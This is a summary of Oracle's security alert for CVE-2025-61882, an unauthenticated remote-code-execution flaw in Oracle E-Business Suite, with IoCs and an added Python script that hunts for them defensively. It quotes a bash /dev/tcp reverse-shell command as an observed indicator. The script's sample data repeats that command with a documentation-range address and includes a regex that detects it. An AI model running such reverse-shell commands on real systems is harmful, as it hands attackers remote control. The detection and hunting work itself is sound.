Oracle EBS Unauthenticated RCE Exploit

Oracle released a Security Alert for CVE-2025-61882, a remotely exploitable, unauthenticated vulnerability in Oracle E-Business Suite’s Concurrent Processing (BI Publisher Integration) that can lead to remote code execution. Customers are urged to apply the provided updates and to ensure that the prerequisite October 2023 Critical Patch Update is installed. Indicators of compromise and detection details (IP addresses, observed commands, and file hashes) are provided to support immediate hunting and containment. #CVE-2025-61882 #Oracle_E-Business_Suite

Keypoints

  • Oracle Security Alert CVE-2025-61882 affects Oracle E-Business Suite Concurrent Processing (BI Publisher Integration) and allows remote code execution without authentication.
  • The vulnerability is scored CVSS 3.1 Base Score 9.8 with Network attack vector and no privileges or user interaction required.
  • Customers must apply the Security Alert updates promptly and must have applied the October 2023 Critical Patch Update as a prerequisite.
  • Patches via the Security Alert program are provided only for product versions under Premier or Extended Support; unsupported versions should be upgraded.
  • Oracle published indicators of compromise (IPs, commands, and SHA-256 file hashes) to accelerate detection, hunting, and containment.
  • The alert includes an English risk matrix and guidance about how Oracle scores and documents vulnerabilities for customer risk analysis.
  • No external researchers or organizations were credited for reporting this vulnerability in this Security Alert.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Vulnerability CVE-2025-61882 is a remotely exploitable flaw in Oracle E-Business Suite’s BI Publisher Integration allowing remote code execution: ‘This vulnerability is remotely exploitable without authentication… may result in remote code execution.’
  • [T1071] Application Layer Protocol – HTTP is the protocol listed for exploitation, and Oracle notes that its secure variants are implied to be affected as well: ‘The protocol in the risk matrix implies that all of its secure variants are affected as well. For example, if HTTP is listed as an affected protocol, it implies that HTTPS is also affected.’
  • [T1043] Commonly Used Port – The observed command establishes an outbound TCP connection to create a reverse shell: ‘sh -c /bin/bash -i &> /dev/tcp// 0>&1’ (an outbound TCP connection to a specific host and port, both elided in the alert).

Indicators of Compromise

  • [IP] Potential malicious GET/POST activity – 200[.]107[.]207[.]26, 185[.]181[.]60[.]11
  • [Command] Observed reverse shell pattern – sh -c /bin/bash -i >& /dev/tcp// 0>&1 (establish an outbound TCP connection)
  • [SHA-256] Exploit proof-of-concept and payload files – 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d (oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip), aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 (exp.py), and 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b (server.py)
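A defender's offline hunt over the indicators listed above, added here as an example and not part of Oracle's alert: it refangs the two published IP addresses and scans web access-log lines for them, matches the quoted reverse-shell pattern in process command lines (both the `>&` and the `&>` spelling that appear in this summary, and any destination, since the alert elides host and port), and compares observed SHA-256 values against the three published hashes. The log formats, the sample lines, the field names and the 198.51.100.7:4444 destination in one constructed process event are assumptions, not data from the alert.

```python
"""Offline hunt for the published CVE-2025-61882 indicators (added example).

IP addresses, the command pattern and the SHA-256 values are the ones listed in
the summary above; every log line and format below is constructed for the demo.
"""
import hashlib
import re
from typing import Iterable

# Defanged addresses exactly as published; refanged on load so they compare
# against the plain addresses that appear in real logs.
IOC_IPS_DEFANGED = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
IOC_IPS = {ip.replace("[.]", ".") for ip in IOC_IPS_DEFANGED}

# Published SHA-256 values of the PoC archive and the two scripts inside it.
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d":
        "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121": "exp.py",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b": "server.py",
}

# The alert elides the destination ("/dev/tcp//") and the two quotations spell
# the redirection ">&" and "&>", so match an interactive bash redirected into
# any /dev/tcp/ path rather than one literal string.
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\s+(?:>&|&>)\s*/dev/tcp/\S*")

# Assumed NCSA combined log layout: client IP first, quoted request line later.
ACCESS_LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>[^"]*)"')


def scan_access_log(lines: Iterable[str]) -> list[tuple[int, str, str]]:
    """Return (line_no, ip, request) for every request from a published IoC address."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_LINE_RE.match(line)
        if m and m.group("ip") in IOC_IPS:
            hits.append((n, m.group("ip"), m.group("request")))
    return hits


def scan_process_events(cmdlines: Iterable[str]) -> list[tuple[int, str]]:
    """Return (line_no, matched_fragment) for command lines showing the reverse-shell pattern."""
    hits = []
    for n, cmd in enumerate(cmdlines, 1):
        m = REVERSE_SHELL_RE.search(cmd)
        if m:
            hits.append((n, m.group(0)))
    return hits


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of file content, the form the published hashes use."""
    return hashlib.sha256(data).hexdigest()


def match_hashes(observed: dict[str, str]) -> list[tuple[str, str]]:
    """Map {path: sha256hex} to (path, published_name) for each published hash seen."""
    return [(path, IOC_SHA256[h.lower()])
            for path, h in observed.items() if h.lower() in IOC_SHA256]


# Constructed sample telemetry (not real data). 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges; /path-redacted is a placeholder.
SAMPLE_ACCESS_LOG = [
    '203.0.113.9 - - [05/Oct/2025:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '200.107.207.26 - - [05/Oct/2025:10:00:07 +0000] "POST /path-redacted HTTP/1.1" 200 77 "-" "python-requests/2.31"',
    '185.181.60.11 - - [05/Oct/2025:10:00:09 +0000] "GET /path-redacted HTTP/1.1" 302 0 "-" "curl/8.0"',
]
SAMPLE_PROCESS_EVENTS = [
    "user=applmgr cmd=/usr/bin/java -jar concurrent-manager.jar",
    "user=applmgr cmd=sh -c /bin/bash -i >& /dev/tcp/198.51.100.7/4444 0>&1",  # constructed destination
    "user=applmgr cmd=bash -i &> /dev/tcp// 0>&1",  # as quoted in the alert, destination elided
    "user=root cmd=sh -c tar czf /backup/ebs.tgz /u01/app",
]
SAMPLE_HASHES = {
    "/tmp/exp.py": "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "/tmp/notes.txt": sha256_hex(b"benign constructed content"),
}

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("access-log hit:", hit)
    for hit in scan_process_events(SAMPLE_PROCESS_EVENTS):
        print("process hit:", hit)
    for hit in match_hashes(SAMPLE_HASHES):
        print("hash hit:", hit)
```

Run it as-is to see the three constructed hits, or feed `scan_access_log` a real access log opened in text mode and `match_hashes` a `{path: sha256}` inventory from your file integrity tooling. The process matcher is deliberately wider than the two quoted strings: an exact string would miss any destination the attacker actually used, and `/dev/tcp/` redirection from an interactive bash on a concurrent-manager host is rare enough that the broader pattern costs little in false positives.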


Read more: https://www.oracle.com/security-alerts/alert-cve-2025-61882.html